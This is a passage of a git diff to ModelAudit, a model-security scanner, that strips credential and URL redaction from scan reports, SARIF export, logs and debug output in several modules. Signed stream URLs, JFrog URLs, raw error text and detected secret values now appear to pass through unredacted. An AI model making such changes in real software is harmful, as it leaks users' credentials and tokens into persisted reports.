os.path.isabs(path): - return "" - return path - - def _get_cache_info() -> dict[str, Any]: """Get cache information for debug output.""" try: @@ -6081,10 +6075,9 @@ def _get_cache_info() -> dict[str, Any]: cache_manager = get_cache_manager(enabled=True) stats = cache_manager.get_stats() - # Get cache directory path with ~ expansion for privacy cache_dir_path: str | None = None if cache_manager.cache is not None: - cache_dir_path = _sanitize_debug_path(str(cache_manager.cache.cache_dir)) + cache_dir_path = str(cache_manager.cache.cache_dir) return { "enabled": True, @@ -6105,17 +6098,15 @@ def _get_config_info() -> dict[str, Any]: # Shared config with promptfoo shared_config_dir = get_config_directory_path() shared_config_path = os.path.join(shared_config_dir, "promptfoo.yaml") - shared_display_path = _sanitize_debug_path(shared_config_path) # ModelAudit-specific config home = str(Path.home()) modelaudit_config_path = os.path.join(home, ".modelaudit", "user_config.json") - modelaudit_display_path = "~/.modelaudit/user_config.json" return { - "sharedConfigPath": shared_display_path, + "sharedConfigPath": shared_config_path, "sharedConfigExists": os.path.exists(shared_config_path), - "modelauditConfigPath": modelaudit_display_path, + "modelauditConfigPath": modelaudit_config_path, "modelauditConfigExists": os.path.exists(modelaudit_config_path), "userIdGenerated": bool(get_user_id()), } diff --git a/modelaudit/core.py b/modelaudit/core.py index c16bce330..98e822867 100644 --- a/modelaudit/core.py +++ b/modelaudit/core.py @@ -177,19 +177,7 @@ def shared_source_sensitive_caches() -> Iterator[None]: _resolve_hf_cache_path, _trusted_hf_blobs_root, ) -from modelaudit.utils.sources.cloud_storage import ( - is_sensitive_credential_key, - is_stream_url, -) -from modelaudit.utils.sources.cloud_storage import ( - redact_cloud_error_for_display as _redact_cloud_error_for_display, -) -from modelaudit.utils.sources.cloud_storage import ( - redact_stream_error_for_display as _redact_stream_error_for_display, -) -from modelaudit.utils.sources.cloud_storage import ( - redact_stream_url_for_display as _redact_stream_url_for_display, -) +from modelaudit.utils.sources.cloud_storage import is_stream_url logger = logging.getLogger("modelaudit.core") @@ -949,87 +937,66 @@ def _make_trusted_stream_shard_root(path: FilePath) -> object: ) -def _redacted_stream_url_for_reporting(stream_url: str) -> str: - """Return a stream source identifier safe for persisted scan output.""" - return _redact_stream_url_for_display(stream_url) - - -def _redacted_scan_path_for_reporting(path: str) -> str: - if is_stream_url(path): - return f"stream://{_redacted_stream_url_for_reporting(path[9:])}" - return path - - -def _redacted_scan_error_for_reporting(error: object, path: str) -> str: - if is_stream_url(path): - return _redact_stream_error_for_display(error, path[9:]) - return str(error) - - -def _redact_stream_value_for_reporting(value: Any, stream_url: str, report_url: str) -> Any: +def _replace_report_path_value(value: Any, stream_url: str, report_url: str) -> Any: if isinstance(value, BaseModel): - return _redact_stream_value_for_reporting(value.model_dump(mode="python"), stream_url, report_url) + return _replace_report_path_value(value.model_dump(mode="python"), stream_url, report_url) if isinstance(value, AnyUrl): - return _redact_stream_value_for_reporting(str(value), stream_url, report_url) + return _replace_report_path_value(str(value), stream_url, report_url) if isinstance(value, os.PathLike): - return _redact_stream_value_for_reporting(os.fspath(value), stream_url, report_url) + return _replace_report_path_value(os.fspath(value), stream_url, report_url) if isinstance(value, str): - return _redact_cloud_error_for_display(value.replace(stream_url, report_url)) + return value.replace(stream_url, report_url) if isinstance(value, bytes): try: decoded = value.decode("utf-8") except UnicodeDecodeError: return b"" - return _redact_stream_value_for_reporting(decoded, stream_url, report_url).encode("utf-8") + return _replace_report_path_value(decoded, stream_url, report_url).encode("utf-8") if isinstance(value, bytearray): try: decoded = value.decode("utf-8") except UnicodeDecodeError: return bytearray(b"") - return bytearray(_redact_stream_value_for_reporting(decoded, stream_url, report_url), "utf-8") + return bytearray(_replace_report_path_value(decoded, stream_url, report_url), "utf-8") if isinstance(value, dict): - redacted_mapping: dict[Any, Any] = {} + rebased_mapping: dict[Any, Any] = {} for key, item in value.items(): - redacted_key = _redact_stream_value_for_reporting(key, stream_url, report_url) - redacted_mapping[redacted_key] = ( - "" - if is_sensitive_credential_key(key) - else _redact_stream_value_for_reporting(item, stream_url, report_url) - ) - return redacted_mapping + rebased_key = _replace_report_path_value(key, stream_url, report_url) + rebased_mapping[rebased_key] = _replace_report_path_value(item, stream_url, report_url) + return rebased_mapping if isinstance(value, list): - return [_redact_stream_value_for_reporting(item, stream_url, report_url) for item in value] + return [_replace_report_path_value(item, stream_url, report_url) for item in value] if isinstance(value, tuple): - return tuple(_redact_stream_value_for_reporting(item, stream_url, report_url) for item in value) + return tuple(_replace_report_path_value(item, stream_url, report_url) for item in value) if isinstance(value, set): - return {_redact_stream_value_for_reporting(item, stream_url, report_url) for item in value} + return {_replace_report_path_value(item, stream_url, report_url) for item in value} if isinstance(value, frozenset): - return frozenset(_redact_stream_value_for_reporting(item, stream_url, report_url) for item in value) + return frozenset(_replace_report_path_value(item, stream_url, report_url) for item in value) return value -def _redact_stream_record_for_reporting(record: Issue | Check, stream_url: str, report_url: str) -> None: +def _replace_record_report_path(record: Issue | Check, stream_url: str, report_url: str) -> None: for attr in ("location", "message", "why", "rule_code", "type", "name"): value = getattr(record, attr, None) if isinstance(value, str): - setattr(record, attr, _redact_stream_value_for_reporting(value, stream_url, report_url)) + setattr(record, attr, _replace_report_path_value(value, stream_url, report_url)) if record.details: - record.details = _redact_stream_value_for_reporting(record.details, stream_url, report_url) + record.details = _replace_report_path_value(record.details, stream_url, report_url) if record.model_extra: - redacted_extra = _redact_stream_value_for_reporting(record.model_extra, stream_url, report_url) + rebased_extra = _replace_report_path_value(record.model_extra, stream_url, report_url) record.model_extra.clear() - record.model_extra.update(redacted_extra) + record.model_extra.update(rebased_extra) -def _redact_stream_scan_result_for_reporting(scan_result: ScanResult, stream_url: str, report_url: str) -> None: - """Strip signed query material from scanner-owned records before aggregation.""" +def _replace_result_report_path(scan_result: ScanResult, stream_url: str, report_url: str) -> None: + """Replace descriptor-only paths in scanner records before aggregation.""" for issue in scan_result.issues: - _redact_stream_record_for_reporting(issue, stream_url, report_url) + _replace_record_report_path(issue, stream_url, report_url) for check in scan_result.checks: - _redact_stream_record_for_reporting(check, stream_url, report_url) + _replace_record_report_path(check, stream_url, report_url) if scan_result.metadata: - scan_result.metadata = _redact_stream_value_for_reporting(scan_result.metadata, stream_url, report_url) + scan_result.metadata = _replace_report_path_value(scan_result.metadata, stream_url, report_url) scan_result._refresh_metadata_dependent_state() @@ -1069,7 +1036,7 @@ def _normalize_directory_owner_scan_result_for_reporting( ) -> None: """Rewrite descriptor-only owner scan paths before aggregate reporting.""" if owner_scan_path != os.curdir: - _redact_stream_scan_result_for_reporting(scan_result, owner_scan_path, report_path) + _replace_result_report_path(scan_result, owner_scan_path, report_path) return report_root = Path(report_path) @@ -3553,7 +3520,7 @@ def scan_model_directory_or_file( if is_stream_url(path): # Extract the actual URL stream_url = path[9:] # Remove "stream://" prefix - report_url = _redacted_stream_url_for_reporting(stream_url) + report_url = stream_url if progress_callback: progress_callback(f"Streaming analysis: {report_url}", 0.0) @@ -3571,7 +3538,7 @@ def scan_model_directory_or_file( else: scan_result, analysis_complete = stream_analyze_file(stream_url, scanner) if scan_result: - _redact_stream_scan_result_for_reporting(scan_result, stream_url, report_url) + _replace_result_report_path(scan_result, stream_url, stream_url) if not analysis_complete: _mark_inconclusive_scan_outcome(scan_result, "streaming_analysis_incomplete") results.files_scanned += 1 @@ -3688,10 +3655,7 @@ def merge_directory_owner_result(owner_result: ScanResult, *, dispatched: bool) directory_owner_result.add_check( name="Directory Owner Scan", passed=False, - message=( - "Unable to complete logical model-directory analysis: " - f"{_redacted_scan_error_for_reporting(error, path)}" - ), + message=(f"Unable to complete logical model-directory analysis: {error!s}"), severity=IssueSeverity.INFO, location=path, details={ @@ -4893,10 +4857,7 @@ def owner_source_covered_by_child(source: str) -> bool: directory_owner_result.add_check( name="Directory Owner Scan", passed=False, - message=( - "Unable to complete logical model-directory analysis: " - f"{_redacted_scan_error_for_reporting(error, path)}" - ), + message=(f"Unable to complete logical model-directory analysis: {error!s}"), severity=IssueSeverity.INFO, location=path, details={ @@ -5745,8 +5706,8 @@ def owner_source_covered_by_child(source: str) -> bool: results, "Scan interrupted by user", severity=IssueSeverity.INFO.value, details={"interrupted": True} ) except Exception as e: - report_path = _redacted_scan_path_for_reporting(path) - report_error = _redacted_scan_error_for_reporting(e, path) + report_path = path + report_error = str(e) if is_stream_url(path): logger.error(f"Error during scan: {report_error}") else: diff --git a/modelaudit/detectors/jit_script.py b/modelaudit/detectors/jit_script.py index f917895c3..280f04b49 100644 --- a/modelaudit/detectors/jit_script.py +++ b/modelaudit/detectors/jit_script.py @@ -19,6 +19,8 @@ from collections.abc import Callable, Collection, Iterator, Mapping, Sequence from typing import TYPE_CHECKING, Any, TypeVar +from modelaudit.utils.helpers.evidence import format_evidence_string + if TYPE_CHECKING: from modelaudit.models import JITScriptFinding @@ -53,13 +55,6 @@ def create_jit_finding(**kwargs: Any) -> "JITScriptFinding": return JITScriptFinding(**kwargs) -def _redact_code_evidence_snippet(code: str, max_chars: int = 200) -> str: - """Redact credentials from detector code evidence before serializing it.""" - from modelaudit.scanners._evidence_redaction import redact_evidence_string - - return redact_evidence_string(code, max_chars=max_chars) - - # Dangerous TorchScript operations that can execute arbitrary code DANGEROUS_TORCH_OPS = [ # System operations @@ -22717,7 +22712,7 @@ def _extract_and_check_python_code( recommendation=f"Remove {dangerous_import} import - it can be used maliciously", confidence=0.9, framework=framework, - code_snippet=_redact_code_evidence_snippet(code_str), + code_snippet=format_evidence_string(code_str, max_chars=200), type="dangerous_import", operation=None, builtin=None, @@ -22742,7 +22737,7 @@ def _extract_and_check_python_code( recommendation=f"Remove {builtin} usage - it can execute arbitrary code", confidence=0.9, framework=framework, - code_snippet=_redact_code_evidence_snippet(code_str), + code_snippet=format_evidence_string(code_str, max_chars=200), type="dangerous_builtin", operation=None, builtin=builtin, @@ -22864,7 +22859,7 @@ def _extract_and_check_python_code( recommendation=f"Remove {builtin} usage - it can execute arbitrary code", confidence=0.9, framework=framework, - code_snippet=_redact_code_evidence_snippet(code_str), + code_snippet=format_evidence_string(code_str, max_chars=200), type="dangerous_builtin", operation=None, builtin=builtin, diff --git a/modelaudit/detectors/secrets.py b/modelaudit/detectors/secrets.py index ddd3c2848..1f02f362a 100644 --- a/modelaudit/detectors/secrets.py +++ b/modelaudit/detectors/secrets.py @@ -13,6 +13,8 @@ import re from typing import Any +from modelaudit.utils.helpers.evidence import format_evidence_string + logger: logging.Logger = logging.getLogger(__name__) BASIC_AUTH_SECRET_TYPE = "Basic Auth Credentials" @@ -1454,7 +1456,7 @@ def _record_basic_auth_finding( "length": len(token), "confidence": round(confidence, 2), "pattern": pattern.pattern[:50] + "..." if len(pattern.pattern) > 50 else pattern.pattern, - "redacted_value": "Basic ", + "redacted_value": format_evidence_string(matched_text), "message": f"{BASIC_AUTH_SECRET_TYPE} detected (confidence: {confidence:.0%})", "context": f"{safe_context} pos:{position}" if safe_context else f"pos:{position}", "recommendation": f"Remove {BASIC_AUTH_SECRET_TYPE} from model data immediately", @@ -1768,9 +1770,6 @@ def scan_text(self, text: str, context: str = "", is_binary_source: bool = False else: severity = "INFO" - # Redact the secret for safe reporting - redacted = secret_text[:4] + "***" + secret_text[-4:] if len(secret_text) > 10 else "***REDACTED***" - if not self._record_finding( findings, { @@ -1781,7 +1780,7 @@ def scan_text(self, text: str, context: str = "", is_binary_source: bool = False "length": len(secret_text), "confidence": round(confidence, 2), "pattern": pattern.pattern[:50] + "..." if len(pattern.pattern) > 50 else pattern.pattern, - "redacted_value": redacted, + "redacted_value": format_evidence_string(secret_text), "message": f"{description} detected (confidence: {confidence:.0%})", "context": f"{safe_context} pos:{position}" if safe_context else f"pos:{position}", "recommendation": f"Remove {description} from model data immediately" diff --git a/modelaudit/integrations/jfrog.py b/modelaudit/integrations/jfrog.py index e9d37b44e..d673ca8c2 100644 --- a/modelaudit/integrations/jfrog.py +++ b/modelaudit/integrations/jfrog.py @@ -18,7 +18,6 @@ download_artifact, download_jfrog_folder, format_size, - redact_jfrog_url_for_display, ) logger = logging.getLogger(__name__) @@ -144,7 +143,7 @@ def scan_jfrog_artifact( scan_cache_dir = str(Path(raw_cache_dir).expanduser()) if cache_enabled and raw_cache_dir else None download_dir, cleanup_download_dir = _prepare_download_dir(url, scan_cache_dir) start_time = time.time() - display_url = redact_jfrog_url_for_display(url) + display_url = url try: # Detect if URL points to a file or folder diff --git a/modelaudit/integrations/mlflow.py b/modelaudit/integrations/mlflow.py index 73d59060e..ab0b01b2c 100644 --- a/modelaudit/integrations/mlflow.py +++ b/modelaudit/integrations/mlflow.py @@ -14,16 +14,8 @@ from typing import Any from urllib.parse import unquote, urlparse -from ..detectors.network_comm import _redact_urls_in_text from ..models import Check, CheckStatus, Issue, IssueSeverity, ModelAuditResultModel, create_initial_audit_result -from ..scanners._evidence_redaction import ( - MAX_PERCENT_DECODE_PASSES, - MAX_REDACTION_VALUE_DEPTH, - SENSITIVE_CONTAINER_KEY, - redact_evidence_string, - redact_evidence_value, -) -from ..utils.sources.cloud_storage import redact_cloud_error_for_display, redact_url_for_display +from ..utils.helpers.evidence import format_evidence_string, format_evidence_value logger = logging.getLogger(__name__) @@ -52,33 +44,6 @@ _MLFLOW_PERCENT_ESCAPE_RE = re.compile(r"%[0-9A-Fa-f]{2}") _OS_OPEN_SUPPORTS_DIR_FD = os.open in os.supports_dir_fd _IS_WINDOWS = os.name == "nt" -_MLFLOW_SENSITIVE_KEY = rf"(?:{SENSITIVE_CONTAINER_KEY}|credentials?|jwt|session)" -_MLFLOW_SENSITIVE_ASSIGNMENT_RE = re.compile( - r"(?ix)" - r"(?P(?\"(?:\\.|[^\"\\])*\"|'(?:\\.|[^'\\])*'|(?:(?:bearer|basic|token)\s+)?[^\s,;&}\]]+)" -) -_MLFLOW_BRACKETED_SENSITIVE_ASSIGNMENT_RE = re.compile( - r"(?ix)" - r"(?P(?\"(?:\\.|[^\"\\])*\"|'(?:\\.|[^'\\])*'|(?:(?:bearer|basic|token)\s+)?[^\s,;&}\]]+)" -) -_MLFLOW_SENSITIVE_CONTAINER_PREFIX_RE = re.compile( - r"(?ix)" - r"(?P(?[({\[])", -) -_MLFLOW_PROTOCOL_RELATIVE_URL_RE = re.compile( - r"(?i)(?:(?:[\\/]|%(?:25)*(?:2f|5c)){2,})[^\s\"'<>]+", -) -_MLFLOW_BENIGN_AUTH_CONTEXT_RE = re.compile( - r"(?i)\b(?:bearer|basic|token)(?=\s+(?:authentication|endpoint|refresh|service)\b)", -) @dataclass(frozen=True) @@ -202,9 +167,9 @@ def _mlflow_budget_failure_result(model_uri: str, message: str, details: dict[st result.scanner_names = ["mlflow"] result.has_errors = True result.success = False - safe_model_uri = _redact_mlflow_detail_value_for_display(model_uri) - safe_details = redact_evidence_value( - _redact_mlflow_detail_value_for_display(details), + safe_model_uri = format_evidence_string(model_uri, max_chars=_MAX_MLFLOW_ERROR_DISPLAY_CHARS) + safe_details = format_evidence_value( + details, max_string_chars=_MAX_MLFLOW_ERROR_DISPLAY_CHARS, ) @@ -246,9 +211,9 @@ def _mlflow_artifact_trust_failure_result( result.scanner_names = ["mlflow"] result.has_errors = True result.success = False - safe_model_uri = _redact_mlflow_detail_value_for_display(model_uri) - safe_details = redact_evidence_value( - _redact_mlflow_detail_value_for_display(details), + safe_model_uri = format_evidence_string(model_uri, max_chars=_MAX_MLFLOW_ERROR_DISPLAY_CHARS) + safe_details = format_evidence_value( + details, max_string_chars=_MAX_MLFLOW_ERROR_DISPLAY_CHARS, ) @@ -291,9 +256,9 @@ def _mlflow_download_safety_failure_result( result.scanner_names = ["mlflow"] result.has_errors = True result.success = False - safe_model_uri = _redact_mlflow_detail_value_for_display(model_uri) - safe_details = redact_evidence_value( - _redact_mlflow_detail_value_for_display(details), + safe_model_uri = format_evidence_string(model_uri, max_chars=_MAX_MLFLOW_ERROR_DISPLAY_CHARS) + safe_details = format_evidence_value( + details, max_string_chars=_MAX_MLFLOW_ERROR_DISPLAY_CHARS, ) @@ -705,147 +670,8 @@ def _trusted_mlflow_delegated_download_plan( return _MlflowDelegatedDownloadPlan(remote_targets, local_plan) -def _redact_mlflow_error_for_display(error: object) -> str: - def _replace_sensitive_value(match: re.Match[str]) -> str: - value = match.group("value") - quote = value[0] if value[:1] in {'"', "'"} else "" - return f"{match.group('prefix')}{quote}{quote}" - - def _redact_protocol_relative_url(match: re.Match[str]) -> str: - candidate = match.group(0) - decoded = candidate - for _ in range(MAX_PERCENT_DECODE_PASSES): - next_decoded = unquote(decoded) - if next_decoded == decoded: - break - decoded = next_decoded - - normalized = decoded.replace("\\/", "/").replace("\\", "/") - if len(normalized) - len(normalized.lstrip("/")) < 2: - return candidate - normalized = f"//{normalized.lstrip('/')}" - authority = normalized[2:].split("/", 1)[0].split("?", 1)[0].split("#", 1)[0] - if "@" not in authority: - return candidate - - safe_url = redact_url_for_display(f"https:{normalized}") - return safe_url.removeprefix("https:") - - def _redact_sensitive_containers(text: str) -> str: - parts: list[str] = [] - cursor = 0 - closing_delimiters = {"(": ")", "[": "]", "{": "}"} - - while match := _MLFLOW_SENSITIVE_CONTAINER_PREFIX_RE.search(text, cursor): - parts.append(text[cursor : match.start()]) - parts.append(f"{match.group('prefix')}") - stack = [closing_delimiters[match.group("open")]] - quote: str | None = None - escaped = False - index = match.end() - - while index < len(text) and stack: - character = text[index] - if quote is not None: - if escaped: - escaped = False - elif character == "\\": - escaped = True - elif character == quote: - quote = None - elif character in {'"', "'"}: - quote = character - elif character in closing_delimiters: - if len(stack) >= MAX_REDACTION_VALUE_DEPTH: - index = len(text) - break - stack.append(closing_delimiters[character]) - elif character == stack[-1]: - stack.pop() - index += 1 - - if stack: - cursor = len(text) - break - cursor = index - - parts.append(text[cursor:]) - return "".join(parts) - - redacted = _MLFLOW_PROTOCOL_RELATIVE_URL_RE.sub(_redact_protocol_relative_url, str(error)) - redacted = _redact_sensitive_containers(redacted) - redacted = _MLFLOW_BRACKETED_SENSITIVE_ASSIGNMENT_RE.sub(_replace_sensitive_value, redacted) - redacted = _MLFLOW_SENSITIVE_ASSIGNMENT_RE.sub(_replace_sensitive_value, redacted) - contains_url = bool( - re.search(r"(?i)(?:\b[a-z][a-z0-9+.-]*://|\bmodels:/)", redacted) - or _MLFLOW_PROTOCOL_RELATIVE_URL_RE.search(redacted) - ) - if contains_url: - redacted = redact_cloud_error_for_display(_redact_urls_in_text(redacted)) - redacted = _MLFLOW_PROTOCOL_RELATIVE_URL_RE.sub(_redact_protocol_relative_url, redacted) - redacted = _MLFLOW_BRACKETED_SENSITIVE_ASSIGNMENT_RE.sub(_replace_sensitive_value, redacted) - redacted = _MLFLOW_SENSITIVE_ASSIGNMENT_RE.sub(_replace_sensitive_value, redacted) - - benign_auth_contexts: list[tuple[str, str]] = [] - - def _protect_benign_auth_context(match: re.Match[str]) -> str: - placeholder = f"MODELAUDITMLFLOWSAFECONTEXT{len(benign_auth_contexts)}" - benign_auth_contexts.append((placeholder, match.group(0))) - return placeholder - - redacted = _MLFLOW_BENIGN_AUTH_CONTEXT_RE.sub(_protect_benign_auth_context, redacted) - if contains_url: - redacted = redact_evidence_string(redacted, max_chars=None) - else: - redacted = "&".join(redact_evidence_string(part, max_chars=None) for part in redacted.split("&")) - for placeholder, original in benign_auth_contexts: - redacted = redacted.replace(placeholder, original) - - if len(redacted) <= _MAX_MLFLOW_ERROR_DISPLAY_CHARS: - return redacted - return f"{redacted[: _MAX_MLFLOW_ERROR_DISPLAY_CHARS - 3]}..." - - -def _mlflow_text_requires_specialized_redaction(text: str) -> bool: - if "models:/" in text.lower(): - return True - if _MLFLOW_BRACKETED_SENSITIVE_ASSIGNMENT_RE.search(text) or _MLFLOW_SENSITIVE_CONTAINER_PREFIX_RE.search(text): - return True - for match in _MLFLOW_PROTOCOL_RELATIVE_URL_RE.finditer(text): - candidate = match.group(0) - if candidate.startswith("//") and re.search(r"(?i)[a-z][a-z0-9+.-]*:$", text[: match.start()]): - continue - decoded = candidate - for _ in range(MAX_PERCENT_DECODE_PASSES): - next_decoded = unquote(decoded) - if next_decoded == decoded: - break - decoded = next_decoded - normalized = decoded.replace("\\/", "/").replace("\\", "/") - authority = normalized.lstrip("/").split("/", 1)[0].split("?", 1)[0].split("#", 1)[0] - if "@" in authority: - return True - return False - - -def _redact_mlflow_detail_value_for_display(value: Any, *, depth: int = 0) -> Any: - if depth >= MAX_REDACTION_VALUE_DEPTH: - return "" - if isinstance(value, str): - specialized = ( - _redact_mlflow_error_for_display(value) if _mlflow_text_requires_specialized_redaction(value) else value - ) - return redact_evidence_string(specialized, max_chars=_MAX_MLFLOW_ERROR_DISPLAY_CHARS) - if isinstance(value, dict): - return { - key: _redact_mlflow_detail_value_for_display(nested_value, depth=depth + 1) - for key, nested_value in value.items() - } - if isinstance(value, list): - return [_redact_mlflow_detail_value_for_display(item, depth=depth + 1) for item in value] - if isinstance(value, tuple): - return tuple(_redact_mlflow_detail_value_for_display(item, depth=depth + 1) for item in value) - return value +def _format_mlflow_error(error: object) -> str: + return format_evidence_string(str(error), max_chars=_MAX_MLFLOW_ERROR_DISPLAY_CHARS) def _terminal_mlflow_artifact_repository(artifact_repository: Any) -> Any | None: @@ -1385,7 +1211,7 @@ def _preflight_local_mlflow_sources( details.update( { "reason": "artifact_size_unavailable", - "error": _redact_mlflow_error_for_display(exc), + "error": _format_mlflow_error(exc), } ) return _mlflow_budget_failure_result( @@ -1461,7 +1287,7 @@ def _preflight_mlflow_download_budget( raise ValueError("Artifact repository wrapper chain could not be resolved") except Exception as e: details["reason"] = "artifact_size_unavailable" - details["error"] = _redact_mlflow_error_for_display(e) + details["error"] = _format_mlflow_error(e) return _mlflow_budget_failure_result( model_uri, "Unable to determine MLflow artifact size before download", @@ -1475,7 +1301,7 @@ def _preflight_mlflow_download_budget( details.update( { "reason": "artifact_size_unavailable", - "error": _redact_mlflow_error_for_display(exc), + "error": _format_mlflow_error(exc), } ) return _mlflow_budget_failure_result( @@ -1671,7 +1497,7 @@ def _preflight_mlflow_download_budget( ) except Exception as e: details["reason"] = "artifact_size_unavailable" - details["error"] = _redact_mlflow_error_for_display(e) + details["error"] = _format_mlflow_error(e) return _mlflow_budget_failure_result( model_uri, "Unable to determine MLflow artifact size before download", @@ -1702,7 +1528,7 @@ def _preflight_mlflow_download_budget( { "reason": "artifact_size_unavailable", "artifact_file_count": 0, - "error": _redact_mlflow_error_for_display(exc), + "error": _format_mlflow_error(exc), } ) return _mlflow_budget_failure_result( @@ -1797,7 +1623,7 @@ def _download_preflighted_mlflow_artifacts( details.update( { "reason": "artifact_download_verification_failed", - "error": _redact_mlflow_error_for_display(exc), + "error": _format_mlflow_error(exc), } ) return _mlflow_budget_failure_result( @@ -1846,7 +1672,7 @@ def _download_preflighted_mlflow_artifacts( { "reason": "artifact_download_verification_failed", "artifact_path": artifact.path, - "error": _redact_mlflow_error_for_display(exc), + "error": _format_mlflow_error(exc), } ) return _mlflow_budget_failure_result( @@ -1909,7 +1735,7 @@ def _download_preflighted_mlflow_artifacts( details.update( { "reason": "artifact_download_verification_failed", - "error": _redact_mlflow_error_for_display(exc), + "error": _format_mlflow_error(exc), } ) return _mlflow_budget_failure_result( @@ -2083,7 +1909,7 @@ def _download_trusted_mlflow_artifacts( "MLflow artifact repository returned an unsafe artifact listing", { "reason": "artifact_listing_unsafe", - "error": _redact_mlflow_error_for_display(exc), + "error": _format_mlflow_error(exc), }, ) if target.optional_when_missing and not artifact_paths: @@ -2255,7 +2081,7 @@ def _capture_mlflow_download_root( "Unable to establish the MLflow staging directory", { "reason": "artifact_download_root_unavailable", - "error": _redact_mlflow_error_for_display(exc), + "error": _format_mlflow_error(exc), }, ) @@ -2288,7 +2114,7 @@ def _capture_mlflow_download_root( "Unable to hold the MLflow staging directory open", { "reason": "artifact_download_root_unavailable", - "error": _redact_mlflow_error_for_display(exc), + "error": _format_mlflow_error(exc), }, ) @@ -2415,7 +2241,7 @@ def _validate_mlflow_download_tree( "Unable to validate the MLflow staging directory", { "reason": "artifact_download_path_unavailable", - "error": _redact_mlflow_error_for_display(exc), + "error": _format_mlflow_error(exc), }, ) @@ -2447,7 +2273,7 @@ def _resolve_mlflow_download_path( "Unable to verify MLflow artifact download path", { "reason": "artifact_download_path_unavailable", - "error": _redact_mlflow_error_for_display(exc), + "error": _format_mlflow_error(exc), }, ) @@ -2463,7 +2289,7 @@ def _resolve_mlflow_download_path( "Unable to verify the MLflow staging directory identity", { "reason": "artifact_download_root_unavailable", - "error": _redact_mlflow_error_for_display(exc), + "error": _format_mlflow_error(exc), }, ) @@ -2505,7 +2331,7 @@ def _resolve_mlflow_download_path( "Unable to inspect MLflow artifact download path", { "reason": "artifact_download_path_unavailable", - "error": _redact_mlflow_error_for_display(exc), + "error": _format_mlflow_error(exc), }, ) @@ -2609,7 +2435,7 @@ def scan_mlflow_model( return captured_download_root download_root_identity = captured_download_root - logger.debug(f"Downloading MLflow model {_redact_mlflow_error_for_display(model_uri)} to {download_dir}") + logger.debug(f"Downloading MLflow model {_format_mlflow_error(model_uri)} to {download_dir}") local_path: str | None if isinstance(download_plan, _MlflowDownloadPlan): download_result = _download_preflighted_mlflow_artifacts( diff --git a/modelaudit/integrations/sarif_formatter.py b/modelaudit/integrations/sarif_formatter.py index 264faabc3..062068dce 100644 --- a/modelaudit/integrations/sarif_formatter.py +++ b/modelaudit/integrations/sarif_formatter.py @@ -10,27 +10,23 @@ from typing import Any from urllib.parse import quote +from pydantic import TypeAdapter + from modelaudit import __version__ from modelaudit.core_results import ( determine_exit_code, results_have_inconclusive_outcome, results_have_operational_error, ) -from modelaudit.integrations.source_redaction import ( - redact_prevalidated_source_value as _redact_prevalidated_value_for_sarif, -) -from modelaudit.integrations.source_redaction import ( - redact_source_identifier as _redact_path_for_sarif, -) -from modelaudit.integrations.source_redaction import ( - redact_source_text as _redact_text_for_sarif, -) -from modelaudit.integrations.source_redaction import ( - redact_source_value as _redact_value_for_sarif, +from modelaudit.integrations.source_serialization import ( + serialize_source_identifier, + serialize_source_text, + serialize_source_value, ) from modelaudit.models import ModelAuditResultModel from modelaudit.scanner_results import IssueSeverity -from modelaudit.scanners._catboost_evidence_redaction import redact_evidence_string as _redact_catboost_evidence + +_JSON_VALUE_ADAPTER: TypeAdapter[Any] = TypeAdapter(Any) def format_sarif_output( @@ -54,7 +50,7 @@ def format_sarif_output( "runs": [_create_run(audit_result, scan_paths, verbose)], } - return json.dumps(sarif_output, indent=2) + return json.dumps(_JSON_VALUE_ADAPTER.dump_python(sarif_output, mode="json"), indent=2) def _create_run( @@ -63,7 +59,7 @@ def _create_run( verbose: bool, ) -> dict[str, Any]: """Create a SARIF run object from ModelAudit results.""" - safe_scan_paths = [_redact_path_for_sarif(path) for path in scan_paths] + safe_scan_paths = [serialize_source_identifier(path) for path in scan_paths] # Filter issues based on verbosity issues = audit_result.issues @@ -215,7 +211,7 @@ def _create_rules(issues: list, *, prefiltered: bool = False) -> list[dict[str, # Add help information if available if hasattr(issue, "why") and issue.why: - redacted_why = _redact_text_for_sarif(issue.why) + redacted_why = serialize_source_text(issue.why) rule["help"] = {"text": redacted_why, "markdown": redacted_why} rules.append(rule) @@ -242,7 +238,7 @@ def _create_results( "ruleId": rule_id, "ruleIndex": rule_indices[rule_id], "level": _severity_to_sarif_level(issue.severity), - "message": {"text": _redact_text_for_sarif(issue.message)}, + "message": {"text": serialize_source_text(issue.message)}, "locations": [], "partialFingerprints": {}, "relatedLocations": [], @@ -273,68 +269,41 @@ def _create_results( import hashlib fingerprint = "" - fingerprint_location = _redact_path_for_sarif(issue.location or "") + fingerprint_location = serialize_source_identifier(issue.location or "") if issue.details: - evidence_fingerprint = _redact_text_for_sarif(str(issue.details.get("evidence_fingerprint", ""))) + evidence_fingerprint = serialize_source_text(str(issue.details.get("evidence_fingerprint", ""))) if evidence_fingerprint: fingerprint = hashlib.sha256( "\x1f".join((evidence_fingerprint, fingerprint_location, str(issue.severity))).encode() ).hexdigest()[:16] if not fingerprint: - fingerprint_message = _redact_text_for_sarif(issue.message) + fingerprint_message = serialize_source_text(issue.message) fingerprint = hashlib.sha256( f"{fingerprint_message}{fingerprint_location}{issue.severity}".encode() ).hexdigest()[:16] result["partialFingerprints"]["primaryLocationLineHash"] = fingerprint # type: ignore[index] # Add properties with additional details - # Revalidate CatBoost evidence before trusting its redaction markers, then - # apply source URL protection without discarding sanitized command context. - catboost_issue = getattr(issue, "type", None) == "catboost_check" - details = dict(issue.details or {}) - if catboost_issue: - details = _redact_catboost_details_for_sarif(details) - properties = ( - _redact_prevalidated_value_for_sarif(details) if catboost_issue else _redact_value_for_sarif(details) - ) + properties = serialize_source_value(dict(issue.details or {})) properties.pop("rule_code", None) properties.pop("issue_type", None) rule_code = _get_issue_rule_code(issue) if rule_code: properties["rule_code"] = rule_code if hasattr(issue, "type") and issue.type: - properties["issue_type"] = _redact_text_for_sarif(issue.type) + properties["issue_type"] = serialize_source_text(issue.type) if properties: result["properties"] = properties # Add fix suggestions if available if hasattr(issue, "recommendation") and issue.recommendation: - result["fixes"] = [{"description": {"text": _redact_text_for_sarif(issue.recommendation)}}] + result["fixes"] = [{"description": {"text": serialize_source_text(issue.recommendation)}}] results.append(result) return results -def _redact_catboost_details_for_sarif(value: Any) -> Any: - """Revalidate scanner-redacted CatBoost evidence before export.""" - if isinstance(value, str): - return _redact_catboost_evidence(value, max_chars=len(value)) - if isinstance(value, dict): - return {key: _redact_catboost_details_for_sarif(item) for key, item in value.items()} - if isinstance(value, list): - return [_redact_catboost_details_for_sarif(item) for item in value] - if isinstance(value, tuple): - return tuple(_redact_catboost_details_for_sarif(item) for item in value) - if isinstance(value, set): - return {_redact_catboost_details_for_sarif(item) for item in value} 